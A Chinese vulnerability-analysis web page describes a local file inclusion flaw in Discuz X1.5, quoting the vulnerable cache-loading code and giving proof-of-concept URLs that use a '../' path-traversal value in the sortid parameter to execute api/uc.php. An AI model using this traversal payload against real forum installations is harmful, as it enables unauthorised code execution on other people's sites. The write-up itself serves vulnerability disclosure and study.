首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
当前位置:查字典教程网 >网络安全 >漏洞分析 >DISCUZ X1.5 本地文件包含漏洞说明
DISCUZ X1.5 本地文件包含漏洞说明
摘要:config_global.php复制代码代码如下:$_config['cache']['type']=‘file’...

config_global.php

复制代码代码如下:

$_config['cache']['type'] = ‘file’;

function cachedata($cachenames) {

……

$isfilecache = getglobal(‘config/cache/type’) == ‘file’;

……

if($isfilecache) {

$lostcaches = array();

foreach($cachenames as $cachename) {

if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

$lostcaches[] = $cachename;

}

}

……

}

地址:

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

执行了 api/uc.php 页面代码了。

作者: Jannock

【DISCUZ X1.5 本地文件包含漏洞说明】相关文章:

Discuz 娱乐大厅插件V1.0 注入漏洞

Coppermine Photo Gallery跨站脚本及SQL注入漏洞

Ewebeditor2.8.0最终版删除任意文件漏洞分析与解决方法

最新win2003 II6解析漏洞实战及应用

F2blog XMLRPC 上传任意文件漏洞

DedeCms V5 orderby参数注射漏洞

Microsoft IE 脚本错误处理内存破坏漏洞

Windows DNS客户端可预测事件处理ID漏洞

Learn2 STRunner ActiveX控件存在多个栈溢出漏洞

Apple QuickTime 压缩 PICT文件处理远程溢出漏洞

上一篇: 科讯 kesioncms 5.5以下漏洞拿shell方法原理总结(图文)
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
网络安全子分类
最新漏洞分析学习
热门漏洞分析学习